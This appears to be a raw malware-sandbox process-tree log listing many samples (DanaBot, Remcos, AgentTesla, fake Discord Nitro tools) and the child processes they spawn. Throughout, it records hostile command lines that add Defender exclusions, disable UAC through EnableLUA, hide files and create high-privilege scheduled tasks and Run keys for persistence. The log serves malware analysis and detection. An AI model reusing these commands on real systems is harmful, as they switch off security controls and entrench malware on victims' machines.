  "C:\Users\Admin\AppData\Local\Temp\783e538320d6a9f69ac93e74a1296403cd8824596c535f8fc563fbbc21bf362d.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:2268
- C:\Users\Admin\AppData\Local\Temp\DanaBot.exe
  "C:\Users\Admin\AppData\Local\Temp\DanaBot.exe"
  2⤵
  - Executes dropped EXE
  PID:5520
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 156
    3⤵
    - Program crash
    PID:4480
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 432
    3⤵
    - Program crash
    PID:6400
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 428
    3⤵
    - Program crash
    PID:5784
- - C:\Windows\SysWOW64\regsvr32.exe
    C:\Windows\system32\regsvr32.exe -s C:\Users\Admin\AppData\Local\Temp\DanaBot.dll f1 C:\Users\Admin\AppData\Local\Temp\DanaBot.exe@5520
    3⤵
    PID:6432
  - - C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\SysWOW64\rundll32.exe C:\Users\Admin\AppData\Local\Temp\DanaBot.dll,f0
      4⤵
      PID:6768
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 504
    3⤵
    - Program crash
    PID:6468
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Generator and Checker.exe"
  2⤵
  - Executes dropped EXE
  PID:6112
- C:\Users\Admin\AppData\Local\Temp\2020.exe
  "C:\Users\Admin\AppData\Local\Temp\2020.exe"
  2⤵
  PID:4520
- - C:\Users\Admin\AppData\Local\Temp\2020.exe
    "C:\Users\Admin\AppData\Local\Temp\2020.exe"
    3⤵
    PID:1616
- C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe
  "C:\Users\Admin\AppData\Local\Temp\0000005d66af8b05750bd3231458a60857425334f7ee2821a627328fb79084d0.exe"
  2⤵
  PID:2768
- C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\DevilRAT.exe"
  2⤵
  PID:1936
- C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe
  "C:\Users\Admin\AppData\Local\Temp\psychosomatic.RAT.exe"
  2⤵
  PID:5456
- C:\Users\Admin\AppData\Local\Temp\goofy.exe
  "C:\Users\Admin\AppData\Local\Temp\goofy.exe"
  2⤵
  PID:628
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:6960
- - C:\Windows\System32\attrib.exe
    "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
    3⤵
    - Sets file to hidden
    - Views/modifies file attributes
    PID:6788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB8DE.tmp.bat""
    3⤵
    PID:7672
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3396
  - - C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe
      "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe"
      4⤵
      PID:1832
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77bloody_was_here.exe
        5⤵
        
        PID:5420
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /Create /SC ONCE /TN "$77bloody_was_here.exe" /TR "C:\Users\Admin\AppData\Roaming\sdsdasd\$77bloody_was_here.exe \"\$77bloody_was_here.exe\" /AsAdmin" /ST 00:01 /IT /F /RL HIGHEST
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7860
    - - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks.exe" /query /TN $77bloody_was_here.exe
        5⤵
        
        PID:7680
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7960
    - - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /sc daily /tn "bloody_was_here_Task-DAILY-21PM" /TR "%MyFile%" /ST 21:00
        5⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7500
- C:\Users\Admin\AppData\Local\Temp\FutureClient.exe
  "C:\Users\Admin\AppData\Local\Temp\FutureClient.exe"
  2⤵
  PID:780
- - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
    3⤵
    PID:876
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\RuntimeBroker.exe"
      4⤵
      PID:3588
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 876 -s 976
      4⤵
      Program crash
      PID:1248
- C:\Users\Admin\AppData\Local\Temp\nigga.exe
  "C:\Users\Admin\AppData\Local\Temp\nigga.exe"
  2⤵
  PID:5684
- - C:\Windows\SysWOW64\schtasks.exe
    "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\nigga.exe" /rl HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3924
- - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
    "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
    3⤵
    PID:6616
  - - C:\Windows\SysWOW64\schtasks.exe
      "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:620
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B1TlNOWTpxC9.bat" "
      4⤵
      PID:6208
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        5⤵
        
        PID:3532
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7252
    - - C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        5⤵
        
        PID:7400
      - C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7464
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2Ol8YgMITgZ2.bat" "
        6⤵
        
        PID:8172
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        7⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1596
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        7⤵
        
        PID:5436
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        8⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7868
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nszL3TXrAwiQ.bat" "
        8⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        9⤵
        
        PID:7628
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        9⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7640
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        9⤵
        
        PID:5060
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Jh10cH8SSlgZ.bat" "
        10⤵
        
        PID:6184
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2156
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        11⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7464
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        11⤵
        
        PID:8176
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        12⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9ATYWsZKJamc.bat" "
        12⤵
        
        PID:4640
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        13⤵
        
        PID:6464
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        13⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4424
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        13⤵
        
        PID:8056
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        14⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:7864
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zd1RecXOQXNw.bat" "
        14⤵
        
        PID:7916
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        15⤵
        
        PID:1076
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping -n 10 localhost
        15⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:1060
        
        C:\Users\Admin\AppData\Roaming\SubDir\Client.exe
        
        "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"
        15⤵
        
        PID:9152
        
        C:\Windows\SysWOW64\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f
        16⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:8812
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yM4r6qTEBPn9.bat" "
        16⤵
        
        PID:7808
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        17⤵
        
        PID:3476
- C:\Users\Admin\AppData\Local\Temp\amadey.exe
  "C:\Users\Admin\AppData\Local\Temp\amadey.exe"
  2⤵
  PID:4164
- - C:\ProgramData\a5410c88f1\bween.exe
    "C:\ProgramData\a5410c88f1\bween.exe"
    3⤵
    PID:1620
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
      4⤵
      PID:6888
    - - C:\Windows\SysWOW64\reg.exe
        
        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\a5410c88f1\
        5⤵
        
        PID:7048
- C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe
  "C:\Users\Admin\AppData\Local\Temp\AgentTesla.exe"
  2⤵
  PID:5356
- C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
  "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
  2⤵
  PID:1856
- - C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe
    "C:\Users\Admin\AppData\Local\Temp\EliteMonitor.exe"
    3⤵
    PID:5396
  - - C:\Users\Admin\AppData\Local\Temp\setup-25031542853.exe
      C:\Users\Admin\AppData\Local\Temp\\setup-25031542853.exe
      4⤵
      PID:6500
- C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe
  "C:\Users\Admin\AppData\Local\Temp\CrimsonRAT.exe"
  2⤵
  PID:3368
- - C:\ProgramData\Hdlharas\dlrarhsiva.exe
    "C:\ProgramData\Hdlharas\dlrarhsiva.exe"
    3⤵
    PID:5444
- C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe
  "C:\Users\Admin\AppData\Local\Temp\Backdoor.Win32.Rbot.aal.exe"
  2⤵
  PID:3524
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 256
    3⤵
    - Program crash
    PID:5324
- C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
  "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
  2⤵
  PID:4644
- - C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe
    "C:\Users\Admin\AppData\Local\Temp\cf9c950bc1e2f9cc01c4fa6a83d47227e6c0927c31d0cdb165c7799728cbea85.exe"
    3⤵
    PID:6024
- C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
  "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
  2⤵
  PID:1516
- - C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe
    "C:\Users\Admin\AppData\Local\Temp\DISCORD BIRTHDAY NITRO CLAIMER.exe"
    3⤵
    PID:3572
- C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Free Nitros.exe"
  2⤵
  PID:4940
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /sc ONLOGON /RL HIGHEST /tn "'Minecraft"' /tr "'C:\Users\Admin\AppData\Roaming\Minecraft.exe"'
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp753D.tmp.bat""
    3⤵
    PID:7352
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:7776
  - - C:\Users\Admin\AppData\Roaming\Minecraft.exe
      "C:\Users\Admin\AppData\Roaming\Minecraft.exe"
      4⤵
      PID:7564
- C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe
  "C:\Users\Admin\AppData\Local\Temp\Discord Nitro Checker by Unheilgott (1).exe"
  2⤵
  PID:4596
- C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr
  "C:\Users\Admin\AppData\Local\Temp\LoveForyou.scr" /S
  2⤵
  PID:4492
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\love.exe" /S
    3⤵
    PID:4696
- - C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe
    "C:\Users\Admin\AppData\Local\Temp\RarSFX1\ForYou.exe" /S
    3⤵
    PID:6424
- C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
  "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
  2⤵
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\Lokibot.exe
    "C:\Users\Admin\AppData\Local\Temp\Lokibot.exe"
    3⤵
    PID:7720
- C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
  "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
  2⤵
  PID:2288
- - C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe
    "C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"
    3⤵
    PID:696
  - - C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe
      "C:\Users\Admin\AppData\Local\Temp\a\VixenLoader.exe"
      4⤵
      PID:7376
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\taskhostw.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1592
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'taskhostw.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5080
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp6C45.tmp.bat""
        5⤵
        
        PID:2772
      - C:\Windows\system32\timeout.exe
        
        timeout 3
        6⤵
        Delays execution with timeout.exe
        
        PID:7736
  - - C:\Users\Admin\AppData\Local\Temp\a\shwork.exe
      "C:\Users\Admin\AppData\Local\Temp\a\shwork.exe"
      4⤵
      PID:7336
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\shwork.exe"
        5⤵
        
        PID:7872
  - - C:\Users\Admin\AppData\Local\Temp\a\javaw.exe
      "C:\Users\Admin\AppData\Local\Temp\a\javaw.exe"
      4⤵
      PID:7324
    - - C:\Windows\system32\reg.exe
        
        reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
        5⤵
        Modifies registry key
        
        PID:2976
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 1262" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\a\javaw.exe\" /f
        5⤵
        Modifies registry key
        
        PID:7288
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 1262" /t REG_BINARY /d 020000000000000000000000 /f
        5⤵
        Modifies registry key
        
        PID:4784
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 1262" /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:9052
  - - C:\Users\Admin\AppData\Local\Temp\a\ori.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ori.exe"
      4⤵
      PID:3952
  - - C:\Users\Admin\AppData\Local\Temp\a\we.exe
      "C:\Users\Admin\AppData\Local\Temp\a\we.exe"
      4⤵
      PID:1496
  - - C:\Users\Admin\AppData\Local\Temp\a\rem.exe
      "C:\Users\Admin\AppData\Local\Temp\a\rem.exe"
      4⤵
      PID:4372
  - - C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe
      "C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe"
      4⤵
      PID:6280
    - - C:\Windows\TEMP\{F022286E-5464-4CB2-BCAB-E9A9F1188AA5}\.cr\xmsn.exe
        
        "C:\Windows\TEMP\{F022286E-5464-4CB2-BCAB-E9A9F1188AA5}\.cr\xmsn.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\a\xmsn.exe" -burn.filehandle.attached=584 -burn.filehandle.self=580
        5⤵
        
        PID:7796
      - C:\Windows\TEMP\{CC2FDDA3-237B-42B4-8796-E47D62DD697D}\.ba\msn.exe
        
        C:\Windows\TEMP\{CC2FDDA3-237B-42B4-8796-E47D62DD697D}\.ba\msn.exe
        6⤵
        
        PID:5964
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        
        C:\Users\Admin\AppData\Roaming\AltApp_v4\msn.exe
        7⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        8⤵
        
        PID:7208
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        
        C:\Users\Admin\AppData\Local\Temp\cgmon_v2.exe
        9⤵
        
        PID:1180
  - - C:\Users\Admin\AppData\Local\Temp\a\OkH8IPF.exe
      "C:\Users\Admin\AppData\Local\Temp\a\OkH8IPF.exe"
      4⤵
      PID:1684
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:8544
  - - C:\Users\Admin\AppData\Local\Temp\a\tK0oYx3.exe
      "C:\Users\Admin\AppData\Local\Temp\a\tK0oYx3.exe"
      4⤵
      PID:8780
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2280
  - - C:\Users\Admin\AppData\Local\Temp\a\Service.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Service.exe"
      4⤵
      PID:6724
  - - C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe
      "C:\Users\Admin\AppData\Local\Temp\a\bnoaprihjatuasss.exe"
      4⤵
      PID:4896
  - - C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe
      "C:\Users\Admin\AppData\Local\Temp\a\ntladlklthawd.exe"
      4⤵
      PID:8440
  - - C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe
      "C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetup_v0564.exe"
      4⤵
      PID:2796
  - - C:\Users\Admin\AppData\Local\Temp\a\setup.exe
      "C:\Users\Admin\AppData\Local\Temp\a\setup.exe"
      4⤵
      PID:7284
- - C:\ProgramData\Synaptics\Synaptics.exe
    "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
    3⤵
    PID:6904
  - - C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe
      "C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate
      4⤵
      PID:4628
    - - C:\Users\Admin\AppData\Local\Temp\a\x.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
        5⤵
        
        PID:3844
    - - C:\Users\Admin\AppData\Local\Temp\a\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\zx4PJh6.exe"
        5⤵
        
        PID:8720
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        6⤵
        
        PID:2328
    - - C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\laf6w_001.exe"
        5⤵
        
        PID:4728
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:8500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8324
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:7224
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\upnpcont.exe" ""
        7⤵
        
        PID:5344
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        
        PID:4872
    - - C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"
        5⤵
        
        PID:8316
      - C:\Windows\SYSTEM32\schtasks.exe
        
        "schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\discord\RuntimeBroker.exe" /rl HIGHEST /f
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:1304
    - - C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Zoom.ClientSetupv-204827038.exe"
        5⤵
        
        PID:2764
      - C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\372b209e3e76f5fc\ScreenConnect.ClientSetup.msi"
        6⤵
        
        PID:7288
    - - C:\Users\Admin\AppData\Local\Temp\a\Build104.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\Build104.exe"
        5⤵
        
        PID:8728
    - - C:\Users\Admin\AppData\Local\Temp\a\si.exe
        
        "C:\Users\Admin\AppData\Local\Temp\a\si.exe"
        5⤵
        
        PID:1044
- C:\Users\Admin\AppData\Local\Temp\malware.exe
  "C:\Users\Admin\AppData\Local\Temp\malware.exe"
  2⤵
  PID:796
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 796 -s 236
    3⤵
    - Program crash
    PID:5560
- C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_fff8783b7567821cec8838d075d247e1.exe"
  2⤵
  PID:1588
- C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe
  "C:\Users\Admin\AppData\Local\Temp\SteamOBrute.exe"
  2⤵
  PID:3112
- C:\Users\Admin\AppData\Local\Temp\NetWire.exe
  "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
  2⤵
  PID:3620
- - C:\Users\Admin\AppData\Local\Temp\NetWire.exe
    "C:\Users\Admin\AppData\Local\Temp\NetWire.exe"
    3⤵
    PID:4104
- C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe
  "C:\Users\Admin\AppData\Local\Temp\VirusShare_0ac0c5dc1e706e301c8f902b78c41e3b.exe"
  2⤵
  PID:4836
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1724
    3⤵
    - Program crash
    PID:6288
- C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe
  "C:\Users\Admin\AppData\Local\Temp\TEAM BLUE CLIENT.exe"
  2⤵
  PID:3512
- C:\Users\Admin\AppData\Local\Temp\Remcos.exe
  "C:\Users\Admin\AppData\Local\Temp\Remcos.exe"
  2⤵
  PID:5204
- - C:\Windows\SysWOW64\cmd.exe
    /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    PID:5280
  - - C:\Windows\SysWOW64\reg.exe
      C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
      4⤵
      Modifies registry key
      PID:6544
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "
    3⤵
    PID:5880
  - - C:\Windows\SysWOW64\PING.EXE
      PING 127.0.0.1 -n 2
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:6704
  - - C:\Windows\SysWOW64\Userdata\Userdata.exe
      "C:\Windows\SysWOW64\Userdata\Userdata.exe"
      4⤵
      PID:7740
    - - C:\Windows\SysWOW64\cmd.exe
        
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        
        PID:7840
      - C:\Windows\SysWOW64\reg.exe
        
        C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        Modifies registry key
        
